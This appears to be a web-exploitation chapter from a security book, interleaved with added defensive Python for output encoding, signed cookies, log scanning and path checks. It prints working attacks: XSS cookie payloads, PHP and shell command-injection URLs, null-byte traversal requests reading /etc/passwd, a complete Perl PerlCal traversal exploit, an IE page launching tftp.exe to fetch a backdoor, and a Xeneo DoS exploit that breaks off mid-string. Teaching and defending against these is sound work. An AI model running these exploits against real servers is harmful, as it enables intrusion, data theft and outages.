Web Exploitation

This chapter covers the most common attacks we know of. Hackers exploit weaknesses in web software that receive little or no attention. The most common web server weaknesses are found not only in Microsoft Internet Information Server (IIS) but also in the Sun ONE Java web server, Apache and other web servers.


Hackers study the most common and widely deployed web servers looking for remotely exploitable bugs that yield root or full access. The reason is simple: once a remotely exploitable bug is found, the hacker can run malicious code against thousands, if not tens of thousands, of hosts running that software.


The Evolution of Web Applications

Today's Internet is a mix of different technologies, protocols and operating systems spread across the globe. That mix makes it hard for applications to talk to one another.

Web applications hold enormous potential for users and developers, but they can also become a nightmare for security and system administration. Most web code is written to work around some existing security enforcement or to support a particular application framework, and it is rarely independent of the platform it runs on. Most companies and other developers write code in a rush to deploy the web service. That is why so many vulnerabilities are found in this code, exposing customers and system users to attack.


Most web applications keep growing in functionality and scale, which adds many potential vulnerabilities to the code. Companies count on emerging technologies for competitive advantage, but they should make sure a security specialist reviews the code before the product is sold to the public. That reduces the chance of a hacker finding a remote or local bug in the application. Most web attacks take place at the application layer, and a hacker does not need extensive knowledge to gain access to an internal network or a standalone system.


See Table 1-1 for a short summary of typical web application technologies.


Table 1-1 Web Application Technologies

Vendor              Technologies
Sun Microsystems    Java 2 Enterprise Edition (J2EE)
BEA                 WebLogic
IBM                 WebSphere
Microsoft           JavaScript, ASP.NET, ISAPI, Component Object Model (COM), Active Server Pages (ASP)
Apache              Jakarta (server-side Java) and PHP
Generic             HTML, Perl and CGI


The Evolution of Web Exploitation


As web applications have evolved, so has web exploitation, from simple directory listings to remotely exploitable buffer overflows. Many companies work hard to find ways of writing secure code, but hackers keep looking for new and more sophisticated ways of finding bugs and exploiting them.


Malicious Objects: Java/ActiveX Objects


Java and JavaScript


Java objects, or applets, are small applications written in Sun Microsystems' Java programming language, an object-oriented language that treats every element as an object. Java code is compiled into a .class file stored on the web server; unlike many other languages, the source code is not exposed to the web client. Java is one of today's dominant Internet development tools, giving developers portable code that runs on the client through the web.

Another route hackers take is JavaScript, a scripting language used in many server-side and client-side applications.


JavaScript is mainly used to accept user input and to tie other components together. All major web browsers have a built-in JavaScript engine that takes the plain-text JavaScript and interprets the instructions on the client side. Below is a very basic JavaScript example that shows a popup box when a button is clicked.

Example: JavaScript Popup Box

<html>
<head>
<title>Basic JavaScript Example</title>
<script language="javascript">
<!-- hide from JavaScript-challenged browsers

function popup1()
{
    alert("Hello World!");
}

// -->
</script>
</head>
<body>
<h1 align=center>Basic JavaScript Example</h1>
<div align=center>
<form>
<input type="button" value="Hello World!" onclick="popup1()">
</form>
</div>
</body>
</html>

The example above is meant to familiarise you with the language and with what to look for when attacking web applications.

Because JavaScript runs on the client, a hacker can feed the application non-standard input that makes it disclose sensitive information or crash.

Below is an example of malicious JavaScript that executes tftp.exe on the client's local machine.

Example: Execute TFTP Client

<html>
<head>
<title>Execute tftp.exe</title>
<script language="javascript">
<!-- hide from JavaScript-challenged browsers

// window.createPopup() is Internet Explorer-only; the popup is used to host the OBJECT tag
var popup1 = window.createPopup();

function popup2()
{
    var popUpBody = popup1.document.body;
    // A bogus CLSID with CODEBASE pointing at a local executable: old IE versions
    // launched the executable instead of treating it as a control
    popUpBody.innerHTML = '<OBJECT NAME="X" ' +
        'CLASSID="CLSID:11111111-1111-1111-1111-111111111111" ' +
        'CODEBASE="C:/Windows/system32/tftp.exe">' +
        '</OBJECT>';
    popup1.show(390, 290, 300, 300, document.body);
}

// -->
</script>
</head>
<body>
<P onclick="popup2();"><U><font color="#BBBBBB">TFTP</font></U></P>
</body>
</html>


With the code above, clicking the "TFTP" link opens the TFTP (Trivial File Transfer Protocol) client on the victim's system. Once TFTP is running, the attacker can use it to download malicious code such as a backdoor and gain full access to the system. Note that this depends on Internet Explorer-specific behaviour (window.createPopup and an OBJECT CODEBASE pointing at a local executable) that has long since been patched; a current browser ignores it.


ActiveX

Microsoft invented its own client-side scripting model, commonly called ActiveX. ActiveX is a by-product of two other technologies, COM and OLE. Unlike JavaScript, ActiveX has full access to the operating system, which is why Microsoft developed a signing and registration scheme so that the user's browser can identify an ActiveX control and authorise it before it runs. Keep in mind that a signature only says who published the control, not that it is safe; once the user allows it, a signed control still has full access.

Common Web Application Attacks

Cross-Site Scripting

Cross-site scripting is one of the most common security problems today. Most web sites now contain a lot of dynamic content to make the site more user-friendly. Web applications generate and deliver different kinds of output to the user depending on the browser's settings. Dynamic sites carry a threat that static sites do not: cross-site scripting.

A cross-site scripting attack happens when a web application collects malicious data from a client and hands it back out. Usually the data is carried in a hyperlink containing malicious code, and the hacker gets the user to click it from an email, an instant message, a forum post or a web site. Once the web application collects the data, it generates a page for the user that contains the malicious data, but in a way that makes it look like valid content from the legitimate site.

An Example of a Cross-Site Scripting Attack

If a web site or web server does not check for script code and echoes it verbatim back to the user's browser, serious damage follows. A hacker can use a cross-site scripting weakness to obtain a user's cookies, login details and other sensitive information.

Several products have been vulnerable to cross-site scripting in a way that lets a hacker use the Java servlet container itself to echo malicious JavaScript. This lets the hacker build an attack in which the user receives the script from a server they trust.

Below are a few older web servers that were vulnerable to cross-site scripting in this way:
Resin 1.2.2:
http://www.targeted_host/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

WebSphere 3.02:
http://www.targeted_host/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

JRun 3.0:
http://www.targeted_host/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml

These requests produce output like the following (WebSphere shown); the requested name, script tag included, is reflected in the error message:

Message: File not found: file://
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
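The bug in the three containers above is the same: the "File not found" page echoes the requested path without encoding it. The following Python is an added example, not code from the page or from any of those products; the two render functions are hypothetical stand-ins for the container's error page, and the attack paths are constructed from the URLs listed above.

```python
import html
from urllib.parse import unquote

# Constructed attack paths, mirroring the Resin/WebSphere/JRun URLs above.
ATTACK_PATH = "/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp"
ENCODED_ATTACK_PATH = "/%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E.jsp"

TEMPLATE = "<html><body>Message: File not found: %s</body></html>"


def error_page_vulnerable(path):
    """Reflect the decoded request path verbatim: the behaviour the old containers had."""
    return TEMPLATE % unquote(path)


def error_page_fixed(path):
    """HTML-encode anything taken from the request before it goes back to the browser.
    Decode first, then escape, so an encoded <SCRIPT> cannot slip past the escaping."""
    return TEMPLATE % html.escape(unquote(path), quote=True)


def contains_live_script(page):
    """Crude check: does the response still carry an unencoded <script ...> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, render in (("vulnerable", error_page_vulnerable), ("fixed", error_page_fixed)):
        for path in (ATTACK_PATH, ENCODED_ATTACK_PATH):
            page = render(path)
            print("%-10s live script: %-5s  %s" % (name, contains_live_script(page), page))
```

The fixed variant turns `<SCRIPT>` into `&lt;SCRIPT&gt;`, which the browser displays as text rather than executing. Encoding on output is the fix; rejecting "bad" input on the way in is easy to bypass with alternative encodings, as the second attack path shows.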

Cookie Manipulation
Cookie manipulation is a form of attack in which the hacker modifies data exchanged between the client and the web application in ways the application never intended, without any direct access to the server's storage. It can be done through URL strings, cookies and form fields. It is sometimes loosely called a man-in-the-middle attack, although the "middle" is usually just the user's own browser or an intercepting proxy.

Cookies are mostly a convenient store for user data and parameters, and they often carry tokens. Most cookies can be modified by the user and sent back to the server with a different request; free tools exist for exactly this. How far cookie manipulation gets you depends on what the cookie is used for, and most cookies hold session tokens or other values on which authentication decisions are made.

Many cookies are Base64-encoded rather than encrypted, which hides nothing from anyone who bothers to decode them. Below is a basic example of the header a browser receives when a cookie is set.
Example: Set-Cookie

Set-Cookie: varUserName=c0nnie&varUserID=TF7044959; expires=Thu, 19 Jul 2010 20:00:00 GMT; path=/; domain=.security-protocols.com

The browser interprets this as an instruction and stores the values for the site. From then on, whenever the user requests a page from the server, the browser includes the cookie as extra data in the HTTP header. Below is the header the web application receives once the user has logged in:

Cookie: varUserName=c0nnie&varUserID=TF7044959

As you can see from this example, the cookie keeps a record of our login ID. This is a good reason to regularly delete all the cookies from your local machine. A cookie is plain-text input sent back to the server, and it is obviously easy to change. So think about what a hacker could gain by manipulating one.

The example cookie is very straightforward and easy to exploit: the user ID field is what we should try to change. Once I change its value and reconnect to the server, I get the message "Welcome Phil". It looks as if we have taken over another user's login and account. So you may wonder how the web application knows that user ID TF7044959 is named Phil, when Phil never logged in at our site. The mapping must be stored on the server, in something like a database, and the server trusts the ID in the cookie without checking who presented it.
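To make the weakness concrete, here is an added example (my own code, not the page's or the site's): the cookie scheme above rewritten in Python, with the tampering step, beside an HMAC-signed version that detects the edit. The key, the field names and the user IDs are constructed for the example.

```python
import hashlib
import hmac

# Assumed server-side secret for this added example; a real deployment loads it
# from configuration, never from source.
SERVER_KEY = b"constructed-example-key-do-not-reuse"


def parse_cookie(header):
    """Turn 'a=1; b=2' into a dict, the way a server reads the Cookie: header."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs[name] = value
    return pairs


def tamper(header, field, new_value):
    """What the attacker does with a cookie editor: change one field, send it back."""
    pairs = parse_cookie(header)
    pairs[field] = new_value
    return "; ".join("%s=%s" % item for item in pairs.items())


# --- the page's scheme: identity is whatever the cookie says --------------------
def issue_cookie_weak(user_name, user_id):
    return "varUserName=%s; varUserID=%s" % (user_name, user_id)


def who_is_weak(header):
    return parse_cookie(header).get("varUserID")


# --- hardened: same fields plus an HMAC so edits are detected -------------------
def sign(user_name, user_id):
    msg = ("%s|%s" % (user_name, user_id)).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_cookie_signed(user_name, user_id):
    return "varUserName=%s; varUserID=%s; sig=%s" % (
        user_name, user_id, sign(user_name, user_id))


def who_is_signed(header):
    """Return the user ID only if the signature still matches the fields; None otherwise."""
    pairs = parse_cookie(header)
    try:
        expected = sign(pairs["varUserName"], pairs["varUserID"])
        if hmac.compare_digest(expected, pairs["sig"]):
            return pairs["varUserID"]
    except KeyError:
        pass
    return None


if __name__ == "__main__":
    weak = issue_cookie_weak("c0nnie", "TF7044959")
    print("weak   original:", who_is_weak(weak))
    print("weak   tampered:", who_is_weak(tamper(weak, "varUserID", "TF7044960")))
    signed = issue_cookie_signed("c0nnie", "TF7044959")
    print("signed original:", who_is_signed(signed))
    print("signed tampered:", who_is_signed(tamper(signed, "varUserID", "TF7044960")))
```

The signed cookie stops the "Welcome Phil" trick because the edited ID no longer matches the signature. It does not stop replay or theft (the cross-site scripting bug above steals the whole cookie, signature included), so the stronger design is a random session token that the server looks up, with the user ID living only on the server side.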

Techniques for Finding and Exploiting Vulnerabilities

Web servers have always been the easiest way for a hacker to get into an internal network, or simply to compromise systems exposed on the Internet. As we said at the beginning of this chapter, web applications are normally coded as fast as possible and secure coding never enters the programmers' minds. There are numerous ways of finding vulnerabilities in web servers. The next few sections give examples of common fingerprints used in the exploitation of both web servers and web applications.

Basic Exploitation Techniques

'<?' Method

The '<?' sequence opens a PHP code block. Where a web application takes attacker-supplied text and later evaluates or includes it as PHP, injecting a '<?' block lets the attacker execute arbitrary commands on the remote server. Below is an example.

Example: <?

http://target_host/webapp.php=<?passthru("id");?>


On some PHP applications this runs the command on the remote host as the user the web server runs as; the output of id in this example tells you which user that is.

';' Method

The ';' character separates commands on UNIX and Linux shells, so one injected string can run several of them.

Example: ';'

[root@c0nnie]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux c0nnie 2.4.19-16mdk #1 Fri Sep 20 18:15:05 CEST 2002 i686 unknown unknown GNU/Linux


This technique is often used to execute multiple commands on a web server in order to gather sensitive information.

'|' Method

The pipe character is often used on UNIX or Linux systems to chain commands in a single request. In Perl CGIs the classic case is a two-argument open(): a trailing '|' makes Perl run the supplied string as a command instead of opening it as a file.

Example: '|'

http://target_host/foobar.pl?page=../../../../bin/ls%20-al%20/home|


The request above gives a full directory listing of /home on the targeted host.

'%00' Method

%00 is the URL-encoded null byte. C-based runtimes treat it as the end of a string, so it can be used to trick a web application into thinking a different file type is being requested.

Example: '%00'

http://target_host/foobar.pl?page=../../../../etc/passwd

The web application rejects this request because it checks that the file name ends in a valid extension such as .asp or .html.

http://target_host/foobar.pl?page=../../../etc/passwd%00html

With this request the application's check sees a name ending in one of its allowed extensions, but the underlying file open stops at the null byte and reads /etc/passwd. This was a very common problem in web applications written in Perl and PHP (PHP only started rejecting paths containing NUL in its filesystem functions in 5.3.4).


'%20' Method

%20 is the URL-encoded space. A raw space cannot appear in a URL, so this encoding is what lets you pass arguments to an injected command. See the example below.

Example: '%20'

http://target_host/foobar.pl?page=uname%20-a|


The example above runs 'uname -a' on a UNIX or Linux system, which tells an attacker what operating system the host is running. The same method works with any other command of choice.
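The five methods above leave recognisable traces in web server logs once the request target is URL-decoded. The following Python is an added example (not from the page or any product): a small classifier for the '<?', ';', '|', '%00', '%20' and '../' patterns, run over constructed log lines in Common Log Format that mirror the requests shown above. The tag names and the sample addresses are my own.

```python
import re
from urllib.parse import unquote

# Constructed log lines (Common Log Format); the request targets mirror the examples above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Sep/2002:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1203
10.0.0.7 - - [10/Sep/2002:10:01:09 +0000] "GET /foobar.pl?page=../../../etc/passwd%00html HTTP/1.0" 200 881
10.0.0.7 - - [10/Sep/2002:10:01:15 +0000] "GET /foobar.pl?page=uname%20-a| HTTP/1.0" 200 96
10.0.0.9 - - [10/Sep/2002:10:02:30 +0000] "GET /webapp.php?page=%3C%3Fpassthru(%22id%22)%3B%3F%3E HTTP/1.0" 200 44
10.0.0.9 - - [10/Sep/2002:10:02:41 +0000] "GET /cgi-bin/cal_make.pl?p0=../../../../../../etc/passwd%00 HTTP/1.0" 200 1530
10.0.0.5 - - [10/Sep/2002:10:03:00 +0000] "GET /images/logo.gif HTTP/1.0" 200 4521
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Every check runs on the *decoded* target, so %2e%2e%2f and ../ look the same.
CHECKS = {
    "null_byte":      lambda s: "\x00" in s,
    "traversal":      lambda s: "../" in s or "..\\" in s,
    "shell_metachar": lambda s: re.search(r"[;|`]|\$\(", s) is not None,
    "php_tag":        lambda s: "<?" in s,
}


def decode_target(target):
    """URL-decode repeatedly (bounded) so double encoding such as %2500 or %252e is undone."""
    prev = None
    for _ in range(3):
        if target == prev:
            break
        prev, target = target, unquote(target)
    return target


def classify(target):
    """Return the sorted list of check names that fire on a request target."""
    decoded = decode_target(target)
    return sorted(name for name, test in CHECKS.items() if test(decoded))


def scan_log(text):
    """Yield (client, target, tags) for each request that trips at least one check."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        tags = classify(m.group("target"))
        if tags:
            hits.append((line.split()[0], m.group("target"), tags))
    return hits


if __name__ == "__main__":
    for client, target, tags in scan_log(SAMPLE_LOG):
        print("%-10s %-20s %s" % (client, ",".join(tags), target))
```

Decoding before matching is the important part: a signature that looks for the literal string "../" in the raw log line misses "%2e%2e%2f", and one that looks for "%00" misses a client that sends the raw byte. Expect false positives on legitimate query strings that contain ';' or '|', so treat the tags as triage, not verdicts.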

Directory Traversal Vulnerabilities

A directory traversal occurs when a web application or web server does not filter out bad characters sent by a hacker. A crafted request then discloses directories and files outside the normal bounds of the web root.

PerlCal cal_make.pl Directory Traversal

Back in April 2001 Stan, a.k.a. The Pike, found a directory traversal in PerlCal's cal_make.pl. PerlCal is a web scheduler/calendar server driven by CGI scripts. The vulnerability allows anyone to download any file on the local system that the web server's user can read. Below is an example HTTP request.

Example: 'cal_make.pl'

http://target_host/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00


The request retrieves the system's passwd file, which lists all the user accounts. On an older system the password hashes may not be shadowed, making them easy to crack. I coded a very simple exploit for this vulnerability below.

PerlCal cal_make.pl Exploit

#!/usr/bin/perl
# PerlCal cal_make.pl directory traversal
# this vuln was found by: Stan a.k.a. ThePike
#
# Vulnerable systems:
# PerlCal version 2.95 and prior (UNIX)
#
# Written by tommy <tommy@security-protocols.com>
# For Security-Protocols Research Labs
# 09/09/02
#
# usage:
# perl sp-perlcal.pl targeted_host [/etc/passwd | /proc/version]
#
#
################

use strict;
use Socket;

print "-" x 74;
print "\nPerlCal cal_make.pl directory traversal, tommy\@security-protocols.com\n";
print "-" x 74;
print "\n\n";

my $host = $ARGV[0] or die "usage: $0 targeted_host [file]\n";
my $port = 80;
# file to fetch; the trailing %00 chops off whatever extension the script appends
my $fuxor = "/etc/passwd%00";
my @thedata;

($ARGV[1]) && ($fuxor = $ARGV[1] . "%00");

print "w0rking on getting $fuxor from $host\n";

my $iaddr = inet_aton($host) || die "host was not found: $host\n";
my $paddr = sockaddr_in($port, $iaddr) || die "bad address for $host:$port\n";
my $proto = getprotobyname('tcp') || die "cannot get protocol\n";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket could not open: $!\n";
connect(SOCK, $paddr) || die "cannot connect: $!\n";

# twelve ../ are more than enough to reach / from any cgi-bin directory
my $submit = "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../..$fuxor HTTP/1.0\r\nHost: $host\r\n\r\n";
send(SOCK, $submit, 0);
@thedata = <SOCK>;

close(SOCK);

foreach my $lin (@thedata)
{
    print $lin;
}

print "\n-----------------------------------EOF------------------------------------\n\n";
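The cal_make.pl bug combines the two tricks from the previous section, '../' and '%00', and the fix on the server side is the same for every application that builds a file name from request data. The following Python is an added example (my own, not PerlCal's code or anything from the page): a path resolver that decodes, rejects NUL bytes, canonicalises and then checks that the result is still under the web root, exercised against constructed requests including the PerlCal one. The web root path is assumed and does not need to exist.

```python
import os
from urllib.parse import unquote


class PathRejected(Exception):
    """Raised for any request that must not be served."""


def resolve_under_root(webroot, requested, allowed_suffixes=(".html", ".txt")):
    """Map a user-supplied 'page=' value onto a file inside webroot, or raise PathRejected.

    Order matters: decode first (so %2e%2e%2f is seen as ../), reject NUL bytes next
    (the %00 trick; os.lstat would raise on them anyway), then canonicalise and compare
    against the canonical root before the extension is even looked at.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise PathRejected("null byte in requested path")
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/\\")))
    # realpath also follows symlinks, so a link inside webroot pointing at /etc is caught here
    if os.path.commonpath([root, candidate]) != root:
        raise PathRejected("escapes webroot: %s" % candidate)
    if not candidate.endswith(allowed_suffixes):
        raise PathRejected("extension not allowed: %s" % candidate)
    return candidate


def is_rejected(webroot, requested):
    """Convenience wrapper: True if resolve_under_root refuses the request."""
    try:
        resolve_under_root(webroot, requested)
        return False
    except PathRejected:
        return True


if __name__ == "__main__":
    ROOT = "/constructed-webroot"   # assumed document root for the example
    for req in ("index.html",
                "docs/../about.html",
                "../../../../etc/passwd",
                "../../../etc/passwd%00html",
                "..%2f..%2fetc%2fpasswd",
                "../../../../../../../../../../../../etc/passwd%00"):
        try:
            print("%-52s -> %s" % (req, resolve_under_root(ROOT, req)))
        except PathRejected as e:
            print("%-52s -> REJECTED (%s)" % (req, e))
```

Checking the extension before canonicalising, as the vulnerable applications in this chapter did, is exactly what the null byte defeats; checking the canonical path against the canonical root is what makes the number of '../' segments irrelevant.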


Web Server and Web Application Vulnerability Scanning Software

In this section we present some tools that can be used to identify web server vulnerabilities. We have used and evaluated almost all of the web server vulnerability scanners, and the following seem to be the best.

Nikto

Nikto is a web server vulnerability scanner written by Chris Sullo. It performs comprehensive testing against web servers for multiple vulnerabilities, including misconfigurations, insecure or default files and scripts, and over 130 server versions. We feel it is the best free web server scanner available. Nikto uses RFP's LibWhisker as the base for all its socket functionality. Some of Nikto's main features are multiple IDS evasion techniques, SSL support and Perl plug-in support.

Nikto has so many checks, and scans so fast, that it will overwhelm smaller web servers and will definitely show up in intrusion detection logs and web server logs. There is an IDS evasion option that can be used. The best thing about this tool is that you can code your own plug-ins if you want to.


Whisker

Well, the long-anticipated version 2.1 of Whisker has been released. Whisker is a very robust scanning tool whose main function is to check remote web servers for known files. It was introduced in the early days, when most bugs were in CGI scripts with known, exploitable vulnerabilities. Below we demonstrate how Whisker works. Note that Whisker is a Perl script, so make sure Perl is installed.

Whisker comes with a set of database files that the scan engine takes as its primary configuration. The included database files tell Whisker which directories and files to look for, and a few other things such as how web servers react to certain requests. Here is how to run Whisker against a host:

[tf0ne@c0nnie tf0ne]$ perl whisker.pl -h http://target_host.com/

-----------------------------------------------------------------------

Title: Notice

Whisker scans for CGIs by checking to see if the server says a particular URL exists. However, just because a URL exists does not necessarily mean it is vulnerable/exploitable--the vulnerability might be limited to only a certain version of the CGI, and the server might not be using the vulnerable version. There is also the case where many scripts use the same generic CGI name (like count.cgi); in this case, the exact CGI being used may not be the same one that contains the vulnerability.

Thus, the actual vulnerability of the CGI must be verified in order to get a true assessment of risk. Whisker only helps in pointing out the problem areas. The next step after scanning with whisker is to review each found CGI by reviewing the reference URLs or searching for the CGI name on SecurityFocus.com or Google.com.

-----------------------------------------------------------------------

Beginning scan against http://www.target_host.com

----------------------------------------------------------------------

Whisker is currently crawling the website; please be patient.

-----------------------------------------------------------------------

Title: Server banner
Id: 100
Severity: Informational

The server returned the following banner:
Microsoft-IIS/5.0

-----------------------------------------------------------------------

Whisker is done crawling the website.
-----------------------------------------------------------------------


Title: Server OPTIONS results
Id: 109
Severity: Informational

The server responded to an OPTIONS query with the following public methods:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
The allowed methods for '/' are:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

-----------------------------------------------------------------------

Title: Server patch level
Id: 111
Severity: Informational

Testing indicates server patch level to be at or after the following level: Win2K IIS-SRP1 (MS02-018) or SP3


-----------------------------------------------------------------------

Title: viewcode.asp
Id: 621
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspired/viewcode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 622
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspiredtutorial/viewcode.asp

No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 624
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/push/viewcode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 627
Found URL: /siteserver/publishing/viewcode.asp

No specific information is provided for this item.

-----------------------------------------------------------------------

Title: Encountered cookies
Severity: Informational

The following cookies were encountered while scanning:
ASPSESSIONIDSCQATDSA=POKECCICFCJFEMDBHHMKLFIG; path=/

-----------------------------------------------------------------------


Whisker scan completed in 1 minute.

Looking over the output, Whisker has found several potentially exploitable files and directories on this Microsoft IIS 5.0 system, and the OPTIONS result shows WebDAV methods such as PUT, DELETE and MOVE enabled on the root, which deserves a look of its own. The nice thing about Whisker 2.1 is that it provides reference URLs and detailed information on the files it finds. Whisker is a very powerful tool that anyone can use. We hope RFP continues to support it.

Shadow Security Scanner

One of the newer and very impressive vulnerability scanners is Shadow Security Scanner by Safety Lab. This is not just a web server scanner but a full-fledged vulnerability scanner. The latest version as of this writing is SSS 5.41.

Shadow Security Scanner was designed to identify known vulnerabilities, suggest fixes for them, and report other security holes within the network. It has very flexible policies for which audits to perform, and a handy policy wizard that lets you select exactly which ports to scan.

Figure 1-1 Shadow Security Scanner


The reports produced after a scan are very detailed, which makes it easy for any user to read them and act on the vulnerabilities found in their network. Shadow Security Scanner also has a nice auto-update feature that lets you update the scan modules daily. Although this tool is not free, it is definitely worth a try if you are looking for a robust scanner.

Blindly Fuzzing Web Servers for Vulnerabilities

I have had a lot of success fuzzing web servers and other applications for bugs. There are a few really good fuzzers out there. In my experience, SPIKE, written by Dave Aitel, has found numerous remotely exploitable bugs.

SPIKE

SPIKE is an API and a set of tools that let you quickly create network protocol stress tests; it makes reproducing any complex binary protocol fast. The nice thing is that you can apply old techniques to new products: against most web applications, SPIKE quickly finds buffer overflows, SQL injection bugs and format string bugs. I have found it very useful.

There are many advantages to using SPIKE's framework over Perl scripts. SPIKE integrates very well with libntlm and other GPL'd libraries for encryption and other things for which you don't have Perl modules.

SPIKE Programs for Web Applications

·generic_web_server_fuzz
·closed_source_web_server_fuzzer
·webfuzz.c
·webmitm
·ntlm2/ntlm_brute


Below I show how to run SPIKE's closed_source_web_server_fuzz program against Xeneo Web Server 2.2.2.10.0. Let's see what we find!

[tf0ne@c0nnie src]$ ./closed_source_web_server_fuzz 192.168.1.103 80 GET / index .html 0 0

After about an hour, the fuzzing run stopped with a segmentation fault. Looking over the output from SPIKE, the following GET request is the one that crashed the web server:


GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1
Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cookie: VARIABLE=SPLABS; path=/
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)
Variable: result
Host: localhost
Content-length: 513
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now that we have the malicious request, writing an exploit is straightforward. The following program reproduces the crash.

Xeneo Web Server 2.2.2.10.0 DoS Exploit

/* Xeneo Web Server 2.2.2.10.0 DoS
 *
 * Vulnerable systems:
 * Xeneo Web Server 2.2.10.0
 * Vendor:
 * http://www.northernsolutions.com
 *
 * Written and found by tommy <tommy@security-protocols.com>
 * For SP Research Labs
 * 04/23/2003
 *
 * www.security-protocols.com
 *
 * usage:
 * sp-xeneo2 <targetip> [targetport] (default is 80)
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* The request exactly as SPIKE produced it: the oversized Referer, the extra blank
 * line and the Content-length that does not match the body are all kept as found. */
char exploit[] =

"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1\r\n"
"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
